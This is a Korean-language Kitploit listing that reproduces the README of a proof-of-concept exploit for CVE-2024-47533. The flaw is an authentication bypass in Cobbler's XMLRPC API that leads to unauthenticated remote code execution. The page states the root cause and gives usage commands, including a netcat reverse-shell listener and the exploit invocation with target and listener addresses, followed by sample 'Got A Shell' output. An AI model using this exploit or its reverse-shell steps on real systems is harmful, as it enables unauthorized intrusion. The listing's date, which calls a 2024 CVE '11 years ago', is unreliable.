Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-47533-PoC — CVE-2024-47533에 대한 개념 증명 익스플로잇. Cobbler의 XMLRPC API에서 인증 우회를 통해 인증되지 않은 원격 코드 실행 및 리버스 셸을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/00xcanelo/cve-2024-47533-poc
Authentication & AuthorizationExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHub00xcanelo/cve-2024-47533-poc

CVE-2024-47533-PoC

CVE-2024-47533에 대한 개념 증명 익스플로잇. Cobbler의 XMLRPC API에서 인증 우회를 통해 인증되지 않은 원격 코드 실행 및 리버스 셸을 가능하게 합니다.

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-47533 – Cobbler XMLRPC 인증 우회 → 리버스 셸 (인증되지 않은 RCE)

📌 요약

이 저장소는 CVE-2024-47533에 대한 개념 증명(PoC) 익스플로잇을 포함하고 있습니다.
이는 Cobbler의 XMLRPC API에서 발생하는 심각한 인증 우회 취약점으로, **인증되지 않은 원격 코드 실행(RCE)**으로 이어집니다.

이 익스플로잇은 XMLRPC API의 login() 메서드 결함을 이용하여 인증을 우회하고, background_import()를 통해 리버스 셸 명령어를 주입합니다.


⚠️ 면책 조항

이 도구는 교육, 연구 및 승인된 침투 테스트 목적으로만 사용됩니다.
소유하지 않거나 명시적인 서면 허가 없이 시스템에 사용하지 마십시오.
저자는 오용 또는 손해에 대해 책임을 지지 않습니다.


🛠 기술 세부 사항

  • 취약점 유형: 인증 우회 → RCE
  • 영향 받는 구성 요소: Cobbler XMLRPC API
  • 공격 벡터: 네트워크
  • 필요 권한: 없음
  • 사용자 상호 작용: 없음

근본 원인:
utils.get_shared_secret()는 바이너리 모드에서 인코딩으로 파일 읽기를 잘못 처리하여 -1을 잘못 반환하며, 이로 인해 빈 사용자 이름과 -1을 비밀번호로 사용한 인증이 허용됩니다.

영향:
공격자는 다음을 수행할 수 있습니다:

  • 관리자 수준의 API 접근 권한 획득
  • Cobbler 템플릿에 임의의 시스템 명령어 주입
  • 대상에 리버스 셸 실행

🚀 사용 방법

1️⃣ 저장소 클론

root@kitploit:~
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC

2️⃣ 리스너 설정

공격자 머신에서:

root@kitploit:~
nc -lvnp 4444

3️⃣ 익스플로잇 실행

root@kitploit:~
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>

예시:

root@kitploit:~
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444

📂 파일 구조

root@kitploit:~
.
├── CVE-2024-47533.py  # 리버스 셸 익스플로잇 스크립트
└── README.md          # 문서

📸 예시 출력

root@kitploit:~
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.

🧑‍💻 저자

00xCanelo
GitHub Profile


📚 참고 자료

  • NVD: CVE-2024-47533
  • Cobbler Project GitHub
도구 다운로드